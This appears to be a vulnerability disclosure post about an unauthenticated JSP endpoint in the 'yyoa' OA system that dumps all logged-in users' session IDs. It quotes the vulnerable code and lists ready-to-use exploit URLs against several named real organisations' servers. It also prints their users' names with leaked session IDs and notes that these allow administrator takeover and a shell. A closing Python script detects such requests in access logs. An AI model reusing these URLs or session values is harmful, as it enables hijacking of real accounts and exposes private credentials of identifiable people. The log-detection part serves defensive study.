<p>This vulnerability leaks the SessionIDs of the currently logged-in users (all of them).<br><br>With a leaked SessionID you can log in as that user, administrators included; once inside, getting a shell is no trouble at all.<br><br>/yyoa/ext/https/getSessionList.jsp<br><br>Partial code:<br><br></p><pre><code>&lt;%@ page contentType="text/html;charset=GBK"%&gt;
&lt;%@ page session= "false" %&gt;
&lt;%@ page import="net.btdz.oa.ext.https.*"%&gt;
&lt;%
String reqType = request.getParameter("cmd");
String outXML = "";
boolean allowHttps = true;
if("allowHttps".equalsIgnoreCase(reqType)){
    //add code to judge whether it allow https or not
    allowHttps = FetchSessionList.checkHttps();
    if (allowHttps) response.setHeader("AllowHttps","1");
}
if("getAll".equalsIgnoreCase(reqType)){
    outXML = FetchSessionList.getXMLAll();
}
else if("getSingle".equalsIgnoreCase(reqType)){
    String sessionId = request.getParameter("ssid");
    if(sessionId != null){
        outXML = FetchSessionList.getXMLBySessionId(sessionId);
    }
}
else{
    outXML += "&lt;?xml version=\"1.0\" encoding=\"GB2312\"?&gt;\r\n";
    outXML += "&lt;SessionList&gt;\r\n";
    //outXML += "&lt;Session&gt;\r\n";
    //outXML += "&lt;/Session&gt;\r\n";
    outXML += "&lt;/SessionList&gt;\r\n";
}
out.println(outXML);
%&gt;</code></pre><p><br><br>From the code above, when the cmd parameter is getAll the endpoint returns the SessionIDs of all users. The page declares session="false" and performs no authentication or authorization check before calling FetchSessionList.getXMLAll(), so the request is completely unauthenticated; the getSingle branch likewise returns a session record for any ssid without a check.<br><br>For example:<br><br><a href="http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll" rel="nofollow">http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll</a><br><br></p><pre><code>weiph 9EA4F8832FA1C9BA99E3D13E2F01CAF7
zhaozy F9244E7F1B8C39BB8919FAE8E19ED16A</code></pre><p><br><br><a href="http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll" rel="nofollow">http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll</a><br><br></p><pre><code>huangsc 0088D0C9F166AD9E5C4907908B97CF2B
jiangyl 1057A63B52E4D78CA92B989149D1AC37
lisy 1586E35E947B4EF4C92AD27B8D1C279B
zhongjh 1AE537BD94C0286CE5FFE0509B4AB6D0
//...</code></pre><p><br><br><a href="http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll" rel="nofollow">http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll</a><br><br></p><pre><code>yanyongrong 372BE72272E0C6ABB3A5815AACAD5AB8
wujianbo 5D33C475E451E080C074DD741F46470B
wangluolijin 64CCB1F31B206ADA1716A8A0252137EA
tianqinghua 78C93A5F4CEA64E34B654E8FEE470A1E
lidalong 84037EF6F41432DE9EE907C94F7B091B
liujianjun 98745C840A8BE288D91C50BB8D1F6A54</code></pre><p><br><br>Cases:<br><br><a href="http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll" rel="nofollow">http://oa.lzmc.edu.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll</a><br><br><a href="http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll" rel="nofollow">http://www.ssepec.net/yyoa/ext/https/getSessionList.jsp?cmd=getAll</a><br><br><a href="http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll" rel="nofollow">http://oa.wnq.com.cn/yyoa/ext/https/getSessionList.jsp?cmd=getAll</a><br><br><a href="http://60.31.196.2/yyoa/ext/https/getSessionList.jsp?cmd=getAll" rel="nofollow">http://60.31.196.2/yyoa/ext/https/getSessionList.jsp?cmd=getAll</a><br></p>
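<p>As an added example (not part of the original report or the product's code), the following Python script shows how a defender can detect hits on this endpoint in web server access logs: it parses combined-format lines, matches the endpoint path, and flags successful requests whose cmd value is getAll or getSingle, compared case-insensitively because the JSP uses equalsIgnoreCase. The log lines are constructed samples using documentation IP addresses, and the ssid value in them is a made-up placeholder.</p>

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2014:10:01:22 +0800] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1" 200 1843 "-" "curl/7.35.0"
198.51.100.4 - - [12/Mar/2014:10:01:25 +0800] "GET /yyoa/index.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2014:10:02:01 +0800] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getSingle&ssid=PLACEHOLDER_SSID HTTP/1.1" 200 311 "-" "curl/7.35.0"
192.0.2.9 - - [12/Mar/2014:10:02:40 +0800] "GET /yyoa/ext/https/getSessionList.jsp?cmd=allowHttps HTTP/1.1" 200 122 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
ENDPOINT = "/yyoa/ext/https/getsessionlist.jsp"
# The two cmd values that make the JSP emit session IDs; allowHttps only sets a header.
LEAKING_CMDS = {"getall", "getsingle"}


def classify(line):
    """Return (ip, cmd) if the line is a successful request that dumps session IDs, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # Path compared case-insensitively: Windows Tomcat deployments often serve it either way.
    if url.path.lower() != ENDPOINT:
        return None
    # The parameter name "cmd" is looked up case-sensitively (getParameter), the value is not
    # (equalsIgnoreCase), so mirror exactly that when matching.
    cmds = [c.lower() for c in parse_qs(url.query).get("cmd", [])]
    hit = next((c for c in cmds if c in LEAKING_CMDS), None)
    if hit is None or m.group("status") != "200":
        return None
    return m.group("ip"), hit


def scan(log_text):
    """Aggregate hits per source IP as {ip: {cmd: count}} for alerting or blocking."""
    findings = {}
    for line in log_text.splitlines():
        result = classify(line)
        if result:
            ip, cmd = result
            findings.setdefault(ip, {}).setdefault(cmd, 0)
            findings[ip][cmd] += 1
    return findings


if __name__ == "__main__":
    for ip, cmds in scan(SAMPLE_LOG).items():
        print(ip, cmds)
```

Any 200 response to these requests should be treated as a confirmed session-ID disclosure; the remediation is to remove or authenticate the endpoint and invalidate all active sessions.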